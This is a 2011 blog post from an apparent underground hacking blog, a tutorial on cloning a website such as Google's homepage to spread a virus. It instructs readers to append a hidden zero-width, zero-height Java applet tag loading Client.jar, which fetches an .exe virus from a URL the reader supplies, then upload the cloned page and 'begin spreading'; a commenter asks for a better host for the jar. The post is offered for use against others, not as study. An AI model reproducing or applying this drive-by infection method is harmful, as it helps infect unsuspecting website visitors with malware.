About Me

I have lived in the "Underground" world of Hacking, Fraud, Viruses, Warez and such since I was very young. I have multiple accounts on a menagerie of Public and Private sites, forums and FTPs. I have learned the secrets that very few have access to. I hope to enlighten you with a little of this knowledge. In this blog I will post tutorials, downloads and other things that people on "The Scene" don't want you to have. I am. Silent Monk.

Wednesday, March 16, 2011

Clone Any Website to Spread Your Virus

You'll only need one file, client.jar.

Downloading a web page
Well, obviously we have a web page we want to download. In this example I'll be using http://www.google.com. Right click anywhere on the page and click "save as". And save it to an empty folder. I'm using Chrome but I know firefox has a similar feature.

[Image: 5TLyX.png]

Editing the index file
Now open the folder where you saved the file. You'll see you'll have a file and a folder. Rename the file from whatever.htm to index.htm and accept any warning you may get.

Now open up index.htm in notepad. Scroll down to the very bottom of the page, make a new line and add this text:

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">

Replace "YOURVIRUSURL" with the link to your .exe virus.

[Image: VHv0D.png]

Save and close the file.

Placing the .jar file
Quick step, copy the client.jar you downloaded earlier to the same folder as the index.htm.

[Image: A1e5U.png]

That's it! Upload all of the files in the folder (including the folder "whatever_files") to a webhost and begin spreading!

1 comment:

  1. bro how are u good job butt i got some problam u host your .jar file on very bad host
    please host an other link like hot file and others ok thank u
